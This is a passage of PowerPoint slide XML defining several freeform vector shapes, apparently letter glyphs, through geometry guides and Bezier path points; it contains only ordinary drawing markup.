                    <a:pt x="195" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="128"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="102"/>
                    <a:pt x="65" y="76"/>
                    <a:pt x="65" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="43"/>
                    <a:pt x="78" y="30"/>
                    <a:pt x="89" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="30"/>
                    <a:pt x="107" y="63"/>
                    <a:pt x="107" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="82"/>
                    <a:pt x="98" y="100"/>
                    <a:pt x="73" y="128"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="192"/>
                    <a:pt x="76" y="209"/>
                    <a:pt x="83" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="239"/>
                    <a:pt x="97" y="244"/>
                    <a:pt x="105" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="282"/>
                    <a:pt x="69" y="285"/>
                    <a:pt x="62" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="285"/>
                    <a:pt x="34" y="253"/>
                    <a:pt x="34" y="240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="216"/>
                    <a:pt x="40" y="210"/>
                    <a:pt x="63" y="18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1" name="Freeform 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8861A56D-303C-4FD0-9FE8-D67AE0D8702A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId38"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1752600" y="1455738"/>
              <a:ext cx="88900" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 204 h 223"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 220 h 223"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 223"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 223"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 223"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 78 h 223"/>
                <a:gd name="T12" fmla="*/ 85 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 223"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 37 h 223"/>
                <a:gd name="T16" fmla="*/ 35 w 234"/>
                <a:gd name="T17" fmla="*/ 60 h 223"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 37 h 223"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 223"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 31 h 223"/>
                <a:gd name="T24" fmla="*/ 149 w 234"/>
                <a:gd name="T25" fmla="*/ 82 h 223"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 156 h 223"/>
                <a:gd name="T28" fmla="*/ 82 w 234"/>
                <a:gd name="T29" fmla="*/ 223 h 223"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 204 h 223"/>
                <a:gd name="T32" fmla="*/ 149 w 234"/>
                <a:gd name="T33" fmla="*/ 111 h 223"/>
                <a:gd name="T34" fmla="*/ 149 w 234"/>
                <a:gd name="T35" fmla="*/ 153 h 223"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 184 h 223"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 223"/>
                <a:gd name="T40" fmla="*/ 34 w 234"/>
                <a:gd name="T41" fmla="*/ 156 h 223"/>
                <a:gd name="T42" fmla="*/ 149 w 234"/>
                <a:gd name="T43" fmla="*/ 11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4" h="223">
                  <a:moveTo>
                    <a:pt x="155" y="204"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="220"/>
                    <a:pt x="209" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="220"/>
                    <a:pt x="234" y="220"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="221" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="187"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="78"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="85" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="52"/>
                    <a:pt x="23" y="60"/>
                    <a:pt x="35" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="60"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="57" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="33"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="31"/>
                    <a:pt x="81" y="31"/>
                    <a:pt x="86" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="31"/>
                    <a:pt x="149" y="46"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="83"/>
                    <a:pt x="0" y="108"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="31" y="223"/>
                    <a:pt x="82" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="223"/>
                    <a:pt x="131" y="219"/>
                    <a:pt x="155" y="204"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="149" y="111"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="149" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="164"/>
                    <a:pt x="149" y="175"/>
                    <a:pt x="130" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="34" y="175"/>
                    <a:pt x="34" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="132"/>
                    <a:pt x="77" y="113"/>
                    <a:pt x="149" y="11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2" name="Freeform 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3011DA72-5435-4A70-84DD-265DC4203C54}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId39"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1855787" y="1455738"/>
              <a:ext cx="76200" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 223"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 223"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 223"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 223"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 31 h 223"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 223"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 60 h 223"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 37 h 223"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 223"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 223"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 223 h 223"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25" fmla="*/ 16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23">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="88"/>
                    <a:pt x="49" y="31"/>
                    <a:pt x="116" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="31"/>
                    <a:pt x="146" y="31"/>
                    <a:pt x="146" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="53"/>
                    <a:pt x="156" y="60"/>
                    <a:pt x="168" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="60"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="110" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="223"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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3" name="Freeform 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3D15F10-B3AC-4D2A-8046-D50F771BF23C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId40"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1957387" y="1455738"/>
              <a:ext cx="74613" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 223"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 223"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 223"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 223"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 112 h 223"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 31 h 223"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 223"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 60 h 223"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 37 h 223"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 223"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 112 h 223"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 223 h 223"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25" fmla="*/ 16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23">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="169"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="31"/>
                    <a:pt x="116" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="31"/>
                    <a:pt x="145" y="31"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="53"/>
                    <a:pt x="155" y="60"/>
                    <a:pt x="167" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="60"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="47" y="223"/>
                    <a:pt x="110" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="223"/>
                    <a:pt x="196" y="174"/>
                    <a:pt x="196"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4" name="Freeform 145">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D580D9-1CBB-4AEE-8629-AB673CA205CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId41"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2054225" y="1455738"/>
              <a:ext cx="77788" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 125 h 223"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 223"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 223"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 112 h 223"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 223 h 223"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 223"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 223"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 223"/>
                <a:gd name="T16" fmla="*/ 119 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 223"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 125 h 223"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 125 h 223"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 95 h 223"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 31 h 223"/>
                <a:gd name="T26" fmla="*/ 169 w 204"/>
                <a:gd name="T27" fmla="*/ 95 h 223"/>
                <a:gd name="T28" fmla="*/ 36 w 204"/>
                <a:gd name="T29" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="184" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="125"/>
                    <a:pt x="204" y="125"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="223"/>
                    <a:pt x="115" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="223"/>
                    <a:pt x="204" y="178"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="188"/>
                    <a:pt x="133" y="192"/>
                    <a:pt x="119" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="125"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="95"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="31"/>
                    <a:pt x="108" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="31"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="36" y="9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5" name="Freeform 146">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D959FFE-02E1-4FA3-B190-D9C2DFC39AAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId42"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2157412" y="1455738"/>
              <a:ext cx="74613" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 93 h 223"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 87 h 223"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 223"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 31 h 223"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 59 h 223"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 76 h 223"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 223"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 21 h 223"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 223"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 11 h 223"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 223"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 59 h 223"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 121 h 223"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 223"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 223"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 148 h 223"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 223"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 154 h 223"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 223"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 223 h 223"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 204 h 223"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 223 h 223"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 223"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 9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3">
                  <a:moveTo>
                    <a:pt x="113" y="93"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="91"/>
                    <a:pt x="92" y="89"/>
                    <a:pt x="79" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="85"/>
                    <a:pt x="31" y="79"/>
                    <a:pt x="31" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="46"/>
                    <a:pt x="47" y="31"/>
                    <a:pt x="94" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="31"/>
                    <a:pt x="142" y="46"/>
                    <a:pt x="144" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="67"/>
                    <a:pt x="146" y="76"/>
                    <a:pt x="161" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="76"/>
                    <a:pt x="178" y="65"/>
                    <a:pt x="178" y="55"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="13"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="41"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="105"/>
                    <a:pt x="53" y="114"/>
                    <a:pt x="99" y="121"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="125"/>
                    <a:pt x="163" y="131"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="176"/>
                    <a:pt x="145" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="187"/>
                    <a:pt x="35" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="139"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="144"/>
                    <a:pt x="0" y="154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="223"/>
                    <a:pt x="15" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="223"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="222"/>
                    <a:pt x="85" y="223"/>
                    <a:pt x="99" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="223"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="106"/>
                    <a:pt x="129" y="95"/>
                    <a:pt x="113" y="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6" name="Freeform 147">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19A04FD6-3C68-42A3-B6C7-5076688F78CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId43"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2259012" y="1455738"/>
              <a:ext cx="74613" cy="88900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 93 h 223"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 87 h 223"/>
                <a:gd name="T4" fmla="*/ 30 w 193"/>
                <a:gd name="T5" fmla="*/ 59 h 223"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 31 h 223"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 59 h 223"/>
                <a:gd name="T10" fmla="*/ 160 w 193"/>
                <a:gd name="T11" fmla="*/ 76 h 223"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 55 h 223"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 21 h 223"/>
